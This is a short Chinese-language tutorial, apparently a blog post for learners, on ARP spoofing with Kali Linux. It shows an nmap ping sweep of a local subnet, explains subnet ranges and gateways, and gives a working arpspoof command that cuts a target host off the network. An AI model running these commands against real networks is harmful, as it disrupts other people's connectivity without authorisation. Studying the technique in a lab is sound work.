本文仅供学习使用,请勿用作其他用途。任何未经允许的渗透行为均属违法行为。**
1、查看kali的ip地址和网关
ifconfig
2、使用nmap扫描局域网存活主机与信息
nmap -sP 192.168.2.0/24
//192.168.2.0/24表示的IP范围
192.168.2.0换成32位二进制,四组,每组8位
/24 表示前24位不变,后8位由全0变化到全1的过程,也就是由“00000000”变化到“11111111”
又因为全0是子网网络地址,全1是子网广播地址,这两个地址是不分配给主机使用的。
所以有效的可分配的范围是前24位不变,后8位由“00000001”变化为“11111110”的范围
再转换回十进制就是 192.168.2.1~192.168.2.254
//nmap嗅探中一般第一个就是网关(nmap scan repot for 192.168.1.1 ,斜字体为示例网关)
3、运行arpspoof工具实现ARP断网攻击
arpspoof -i eth0 -t 192.168.2.223(目标IP) 192.168.2.1(网关IP)
//什么是网关,和ip地址有什么区别?: IP地址IP地址是Internet Protocol(因特网协议)中用于标识不同设备的唯一地址。在一个网络中,每个设备都必须拥有一个唯一的IP地址,以便其他设备可以通过该地址与其进行通信。IP地址由32位二进制数表示,通常以“点分十进制”方式表示,例如192.168.0.1。IP地址分为公网IP地址和私有IP地址,其中公网IP地址可以被互联网访问,而私有IP地址只能在局域网内使用。 网关网关是一种网络设备,用于实现不同网络之间的通信。当两个不同网络需要进行通信时,它们之间需要有一个网关来进行转换和传递数据。网关可以是一台 路由器、交换机或者防火墙等设备 ,通常拥有两个或多个网络接口,分别连接不同的网络。在进行数据传输时,数据包会先发送到网关,然后由网关将数据包转发到目标网络中的设备。 //linux上如何查看自己的默认网关?
4.输入route查看本机网关
//default右侧为默认网关ip
5.被攻击的主机实现断网效果,恢复使用ctrl+c
部分信息可能已经过时
